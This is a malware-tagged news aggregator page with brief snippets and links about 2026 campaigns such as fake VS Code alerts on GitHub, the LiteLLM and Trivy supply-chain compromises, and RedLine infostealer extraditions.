Tag: malware
-
Fake VS Code alerts on GitHub spread malware to developers
A large-scale campaign is targeting developers on GitHub with fake Visual Studio Code (VS Code) security alerts posted in the Discussions section of various projects, to trick users into downloading malware. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/fake-vs-code-alerts-on-github-spread-malware-to-developers/
-
Hackers Target South Asian Financial Firm with BRUSHWORM and BRUSHLOGGER Attacks
A South Asian financial institution has been hit by a custom malware toolkit combining a modular backdoor, dubbed BRUSHWORM, and a DLL side”‘loaded keylogger known as BRUSHLOGGER. The attackers relied on a backdoor initially named paint.exe and a keylogger masquerading as libcurl.dll, both of which lacked advanced packing or obfuscation. BRUSHWORM acts as the primary implant, handling…
-
Hackers Deploy USB Malware, RATs, and Stealers in Southeast Asian Government Attacks
A multi-cluster cyberespionage operation in which attackers used USB-propagated malware, multiple RATs, loaders, and a custom stealer to target a Southeast Asian government organization between June and August 2025. Analysts initially observed USB-borne malware dubbed USBFect (also known as HIUPAN), which spreads through removable drives and deploys the PUBLOAD backdoor for lateral movement. Further telemetry revealed two…
-
Breach Roundup: Tycoon2FA Phishing Platform Rebounds
Tags: 2fa, attack, breach, data, data-breach, healthcare, iran, malware, north-korea, oracle, phishing, ransomware, russiaAlso, Russian Signal Phishing, Iran-Linked Malware, Breaches in Spain and France. This week, Tycoon 2FA, Trio-Tech, messaging app spying and a ransomware broker sentenced. Iran-linked hackers. Mazda disclosed a breach. Oracle patched a flaw. North Korean actors weaponized VS Code, a Spanish port ransomware attack, a French teacher data breach and a healthcare firm victim…
-
LiteLLM Hit in Cascading Supply-Chain Attack
Stolen Credentials From Trivy Breach Let Hackers Push Malware to PyPI. Threat group TeamPCP exploited credentials stolen in the Trivy breach to push malicious versions of LiteLLM to PyPI, exposing developers to credential theft, persistent backdoors and lateral movement tools within hours of publication. First seen on govinfosecurity.com Jump to article: www.govinfosecurity.com/litellm-hit-in-cascading-supply-chain-attack-a-31210
-
Alleged RedLine malware developer extradited to US, faces up to 30 years
Hambardzum Minasyan appeared in an Austin federal court on Tuesday and was indicted on charges of conspiracy to commit access device fraud, conspiracy to violate the Computer Fraud and Abuse Act and conspiracy to commit money laundering. First seen on therecord.media Jump to article: therecord.media/redline-malware-developer-extradited-to-us-faces-30-years
-
New ClickFix Attack Exploits Windows Run Dialog and macOS Terminal to Deploy Malware
Threat actors are standardizing a powerful ClickFix-based attack that abuses the Windows Run dialog box and macOS Terminal to deliver malware while sidestepping traditional browser protections. Insikt Group has tracked five distinct ClickFix activity clusters active since at least May 2024, with lures impersonating brands such as Intuit QuickBooks and Booking.com. Using Recorded Future’s HTML…
-
New PXA Stealer Malware Targets Banks, Uses Telegram to Exfiltrate Data
CyberProof researchers have detected a 10% surge in PXA Stealer attacks targeting financial institutions in Q1 2026. Learn… First seen on hackread.com Jump to article: hackread.com/financial-firms-rise-pxa-stealer-attacks/
-
Second RedLine infostealer operator ends up in US custody
Tags: malwareHambardzum Minasyan, an Armenian man extradited to the United States, is accused of conspiring with others to develop and operate the RedLine infostealer malware used to steal … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/03/26/redline-infostealer-developer-extradited-us-charged/
-
Hochentwickelte PlugXKampagne nutzt den aktuellen Nahostkonflikt als Köder
Kurz nach dem Aufflammen der kriegerischen Auseinandersetzungen in der Region des Persischen Golfs machten sich Bedrohungsakteure diesen Konflikt bereits für eine virtuelle Angriffskampagne zunutze. Die Sicherheitsexperten von Threatlabz beobachten seit dem 1. März 2026 einen neuen Cyberangriff zur Auslieferung einer PlugX-Backdoor-Variante. Aufbauend auf den aufgedeckten Tools, Techniken und Prozessen der Multi-Stage-Kampagne schreiben die Analysten des…
-
GhostClaw AI Malware Targets macOS Users with Credential-Stealing Payloads
GhostClaw is a multi-stage macOS infostealer that now abuses both GitHub and AI-assisted development workflows to harvest credentials and deploy secondary payloads, significantly widening its potential victim base. Jamf Threat Labs has since expanded on this work, uncovering at least eight additional samples hosted in GitHub repositories that impersonate trading bots, SDKs, and developer tools.…
-
Iran-Krieg wird für Malware-infizierte Geschäftskommunikation genutzt
Seit Ende Februar 2026 registrieren die Bitdefender Labs eine spürbare Zunahme von Cyberangriffen im Nahen Osten. First seen on it-daily.net Jump to article: www.it-daily.net/it-sicherheit/cybercrime/iran-krieg-malware-geschaeftskommunikation
-
GitHub phishers use fake OpenClaw tokens to drain crypto wallets
Smart, obfuscated malware code: According to OX, the malicious phishing and wallet-stealing code is “highly obfuscated” and resides within the “eleven.js” JavaScript file in the repository.The threat actor used “watery-compost[.]today” to host a C2 server to collect information (including wallet address, transaction value, and name) and drain wallets once they were connected. Commands used by…
-
Suspected Hijacked Developer Accounts Spread npm Malware
Sonatype uncovers a sophisticated malware campaign using hijacked npm developer accounts to steal API keys and passwords. Is your dev environment at risk? First seen on hackread.com Jump to article: hackread.com/suspected-hijacked-developer-accounts-npm-malware/
-
Suspected RedLine infostealer malware admin extradited to US
Tags: malwareAn Armenian suspect was extradited to the United States to face criminal charges for allegedly helping manage RedLine, one of the most prolific infostealer malware operations in recent years. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/suspected-redline-infostealer-administrator-extradited-to-us/
-
Torg Grabber Malware Shifts from Telegram Exfiltration to Encrypted REST API for C2
A fast-evolving information”‘stealing malware dubbed “Torg Grabber” that has shifted from simple Telegram”‘based exfiltration to a hardened, encrypted REST API command”‘and”‘control (C2) channel fronted by Cloudflare. The operation surfaced when a 747 KB 64″‘bit sample initially tagged as Vidar was found to be fundamentally different from known Vidar builds, exposing an internal debug string “grabber…
-
Fake Screenshot Lures Target Web3 Support Staff with Multi-Stage Malware Attack
Fake screenshot links are being used to quietly deploy a multi”‘stage backdoor against Web3 customer support teams, in a campaign assessed to be linked to the Chinese financially motivated group APT”‘Q”‘27 (GoldenEyeDog). The operation abuses live chat workflows, signed .NET loaders, AWS S3 dead drops, and DLL sideloading to land a memory”‘resident Farfli backdoor that…
-
Kiss Loader Malware Targets with Early Bird APC Injection in New Attack Campaign
A newly identified malware loader dubbed “Kiss Loader” is emerging as a potential threat, leveraging advanced process injection techniques and dynamic delivery infrastructure. The loader, still under active development at the time of discovery, demonstrates a blend of stealth, modular staging, and experimental implementation, suggesting it may evolve into a more mature attack tool. When…
-
Preventing Account Takeovers: A Practical Guide to Detection and Response
Yesterday’s password leak can become tomorrow’s identity crisis. According to research firm Gitnux, account-takeover attacks jumped 354 percent in 2023, driven by bots that replay stolen credentials and infostealer malware that sidesteps multi-factor prompts. The fallout, billions in fraud losses, shaken customer trust, and security teams scrambling, demands a clear plan. In this article, we:…
-
WebRTC Skimmer Bypasses CSP to Steal Payment Data from E-Commerce Sites
Cybersecurity researchers have discovered a new payment skimmer that uses WebRTC data channels as a means to receive payloads and exfiltrate data, effectively bypassing security controls.”Instead of the usual HTTP requests or image beacons, this malware uses WebRTC data channels to load its payload and exfiltrate stolen payment data,” Sansec said in a report published…
-
Microsoft Unveils New Guidance to Detect and Defend Against Trivy Supply Chain Attack
Tags: attack, credentials, cve, cyber, malware, microsoft, supply-chain, threat, tool, vulnerabilityAqua Security’s vulnerability scanner, Trivy, suffered a sophisticated CI/CD supply chain compromise. The threat actor, identified as TeamPCP, leveraged prior incomplete remediation to inject credential-stealing malware into official releases. This incident, tracked as CVE-2026-33634, successfully weaponized a trusted security tool against the organizations relying on it to stay safe. This visualizes the attack propagation timeline…
-
Fake VS Code Security Alerts on GitHub Spread Malware in Massive Phishing Attack
A large-scale phishing campaign is actively targeting developers on GitHub by abusing the platform’s Discussions feature to distribute fake Visual Studio Code (VS Code) security alerts. The campaign appears highly coordinated, with thousands of near-identical posts discovered across multiple repositories, indicating automated mass exploitation rather than isolated abuse. Attackers are creating GitHub Discussions with alarming…
-
Delve did the security compliance on LiteLLM, an AI project hit by malware
LiteLLM offers an AI open source project used by millions that was infected by credential harvesting malware. First seen on techcrunch.com Jump to article: techcrunch.com/2026/03/25/delve-did-the-security-compliance-on-litellm-an-ai-project-hit-by-malware/
-
Alleged RedLine infostealer conspirator extradited to US
Tags: malwareThe Armenian man faces three counts for his role for allegedly administering “one of the most prevalent infostealing malware variants in the world.” First seen on cyberscoop.com Jump to article: cyberscoop.com/alleged-redline-infostealer-conspirator-extradited-to-us/
-
An Evolving GlassWorm Malware is Making the Rounds of Code Repositories
Threat researchers with various vendors for the past year have been tracking the efforts of a bad actor dubbed GlassWorm known for dropping malicious extensions in code registries like npm, Open VSX, PyPI, and Microsoft’s Visual Studio Marketplace with the aim of stealing secrets and cryptocurrency. This month, threat researchers wrote about a resurgence in..…
-
Mirai Malware Evolves into Hundreds of Variants Driving Botnet Growth
Mirai malware evolves into hundreds of variants, driving botnet growth, including Aisuru and KimWolf, powering large-scale attacks, and increasing risks to vulnerable IoT devices worldwide. First seen on hackread.com Jump to article: hackread.com/mirai-malware-variants-botnet-growth/
-
Mirai Malware Evolves into Hundreds of Variants Driving Botnet Growth
Mirai malware evolves into hundreds of variants, driving botnet growth, including Aisuru and KimWolf, powering large-scale attacks, and increasing risks to vulnerable IoT devices worldwide. First seen on hackread.com Jump to article: hackread.com/mirai-malware-variants-botnet-growth/
-
New Torg Grabber infostealer malware targets 728 crypto wallets
A new info-stealing malware called Torg Grabber is stealing sensitive data from 850 browser extensions, more than 700 of them for cryptocurrency wallets. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/new-torg-grabber-infostealer-malware-targets-728-crypto-wallets/